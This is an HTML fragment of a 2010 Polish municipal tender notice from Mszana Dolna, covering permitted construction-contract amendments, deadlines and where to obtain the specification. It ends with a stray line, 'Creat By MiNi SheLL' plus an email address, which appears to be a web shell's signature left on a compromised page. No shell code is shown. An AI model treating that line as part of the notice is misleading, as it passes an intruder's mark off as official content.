<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Przewidywane istotne zmiany do umowy w stosunku do treści wybranej oferty i warunki tych zmian. 

1. Zmiana terminu realizacji przedmiotu umowy.

1)	Zmiana terminu przewidzianego na zakończenie robót-  skrócenia terminu do 31 lipca 2010 roku ( w przypadku uzyskania dotacji finansowej),
2)	Zmiany spowodowane warunkami atmosferycznymi, geologicznymi, archeologicznymi,  w szczególności:
a)	klęski żywiołowe,
b)	warunki atmosferyczne uniemożliwiające prowadzenie robót budowlanych zgodnie ze sztuką  budowlaną,
c)	niewypały i niewybuchy,
d)	wykopaliska archeologiczne,
e)	odmienne od przyjętych w dokumentacji projektowej warunki geologiczne (kurzawka, głazy narzutowe, itp.),
3)	Zmiany będące następstwem okoliczności  leżących po stronie Zamawiającego, w szczególności:
a)	nieterminowe przekazanie terenu budowy przez Zamawiającego,
b)	wstrzymanie robót przez Zamawiającego,
c)	konieczność usunięcia  braków lub  wprowadzenia zmian w dokumentacji projektowej,
4)	Zmiany będące następstwem działania organów administracji, w szczególności:
a)	przekroczenie zakreślonych przez prawo terminów wydawania przez organy administracji decyzji, zezwoleń, uzgodnień, itp.,
b)	odmowa  wydania przez organy administracji wymaganych decyzji, zezwoleń, uzgodnień, itp.,
5)	Inne przyczyny zewnętrzne niezależne od Zamawiającego  oraz Wykonawcy skutkujące niemożliwością prowadzenia prac, w szczególności:
a)	konieczność wykonania robót dodatkowych  lub zamiennych, które  ze względu na zasady wiedzy technicznej i sztuki budowlanej wymagają dodatkowego czasu ponad termin wynikający z umowy.
 
W przypadku wystąpienia którejkolwiek z okoliczności wymienionych w pkt 1-4 termin wykonania  umowy może ulec odpowiedniemu przedłużeniu, o czas niezbędny do zakończenia wykonywania jej przedmiotu w sposób należyty, nie dłużej jednak niż okres trwania tych okoliczności.

2. Zmiana sposobu spełnienia świadczenia.
1)	Zmiany technologiczne, w szczególności:
a)	niedostępność na rynku materiałów lub urządzeń wskazanych w dokumentacji projektowej spowodowane zaprzestaniem produkcji lub wycofaniem z rynku tych materiałów lub urządzeń,
b)	pojawienie się na rynku materiałów lub urządzeń  nowszej generacji  lub o wyższych parametrach użytkowych, które lepiej będą zaspokajać potrzeby zamawiającego, w tym  pozwalających na zaoszczędzenie kosztów realizacji przedmiotu umowy lub kosztów eksploatacji wykonanego przedmiotu umowy
c)	pojawienie się nowszej technologii wykonania zaprojektowanych robót pozwalającej na zaoszczędzenie czasu realizacji inwestycji lub kosztów wykonywanych prac, jak również kosztów eksploatacji wykonanego przedmiotu umowy,
d)	konieczność zrealizowania projektu przy zastosowania innych rozwiązań technicznych/technologicznych lub materiałowych niż wskazane w dokumentacji projektowej, w sytuacji gdyby zastosowanie przewidzianych rozwiązań groziło niewykonaniem lub wadliwym wykonaniem przedmiotu umowy,
e)	odmienne od przyjętych w dokumentacji projektowej warunki geologiczne lub warunki terenowe skutkujące niemożliwością zrealizowania przedmiotu umowy przy dotychczasowych założeniach technologicznych lub materiałowych,
f)	konieczność wykonania robot  zamiennych, z uwagi na wymogi sztuki budowlanej i wiedzy technicznej,
g)	konieczność zrealizowania projektu przy zastosowaniu innych rozwiązań technicznych lub materiałowych ze względu na zmiany obowiązującego prawa,  
2)	Zmiana harmonogramu realizacyjnego robót w zakresie rzeczowo finansowym spowodowana  przyczynami, o których mowa w pkt A i B,
3)	Zmiana terminu umowy lub harmonogramu realizacyjnego robót w zakresie rzeczowo-finansowym na skutek zmian możliwości finansowych Zamawiającego lub zmian umowy zawartej przez Zamawiającego o dofinansowanie zamówienia . 

Zmiany, o których mowa w pkt.1 lit a) do g) nie mogą być podstawą zwiększenia wynagrodzenia. 
Każda ze wskazywanych  w pkt 1 do 3 zmian może być powiązana z obniżeniem wynagrodzenia

B.	Zmiany osobowe.
1)	zmiana osób, przy pomocy których Wykonawca realizuje przedmiot umowy na inne osoby legitymujące się co najmniej równoważnymi uprawnieniami  określonymi niniejszą SIWZ .
2)	zmiana osób, przy pomocy których zamawiający realizuje przedmiot umowy na inne osoby legitymujące się co najmniej równoważnymi uprawnieniami , o których mowa w ustawie z dnia 7 lipca 1994 r. -Prawo budowlane (Dz. U. z 2006 r. Nr 156, poz. 1118 z późń. zm.)

C.	Pozostałe zmiany.
1)	siła wyższa uniemożliwiająca wykonanie przedmiotu umowy zgodnie z SIWZ.
2)	Zmiana sposobu rozliczania umowy lub zmiana dokonywania płatności na rzecz Wykonawcy na skutek zmiany sytuacji finansowej Zamawiającego lub zmian w zawartej przez Zamawiającego umowie  o dofinansowanie projektu lub w wytycznych dotyczących realizacji projektu.
3)	Rezygnacja przez Zamawiającego z realizacji części przedmiotu umowy. W takim przypadku wynagrodzenie przysługujące Wykonawcy zostanie pomniejszone, przy czym Zamawiający zapłaci za wszystkie spełnione świadczenia oraz udokumentowane koszty, które Wykonawca poniósł w związku z wynikającymi z umowy planowanymi świadczeniami,</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.mszana.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Mszana Dolna ul. Spadochroniarzy 6 pok. nr 44.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 31.05.2010 godzina 11:00, miejsce: Urząd Gminy 34-730 Mszana Dolna ul. Spadochroniarzy 6 pok. nr 32- sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com